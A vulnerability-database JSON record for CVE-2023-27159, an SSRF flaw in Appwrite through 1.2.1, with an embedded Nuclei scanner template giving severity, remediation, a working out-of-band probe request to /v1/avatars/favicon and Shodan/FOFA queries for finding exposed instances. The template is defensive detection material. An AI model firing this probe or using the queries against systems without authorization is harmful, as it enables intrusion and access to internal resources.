{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-27159/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-27159/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-27159/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-27159/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-27159/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-27159"},"sightings":{"href":"/api/v1/sightings/cve-2023-27159"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-27159.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-27159\n\ninfo:\n  name: Appwrite <=1.2.1 - Server-Side Request Forgery\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the server.\n  remediation: |\n    Upgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability.\n  reference:\n    - https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a\n    - https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-27159\n    - http://appwrite.com\n    - https://github.com/appwrite/appwrite\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-27159\n    cwe-id: CWE-918\n    epss-score: 0.36419\n    epss-percentile: 0.98435\n    cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: appwrite\n    product: appwrite\n    shodan-query:\n      - title:\"Sign In - Appwrite\"\n      - http.title:\"sign in - appwrite\"\n      - http.favicon.hash:-633108100\n    fofa-query:\n      - icon_hash=-633108100\n      - title=\"sign in - appwrite\"\n    google-query: intitle:\"sign in - appwrite\"\n  tags: cve2023,cve,appwrite,ssrf,oast,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: Appwrite-Server\"\n# digest: 490a004630440220217a0220ae87506ced0e13491f92fd64edbdde60d4c285aee0d5a1d60376e9460220185c2a0f7e1e29b9d02de0578246b5156d670f216d7b6aca132c555f2de7201b:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-27159"}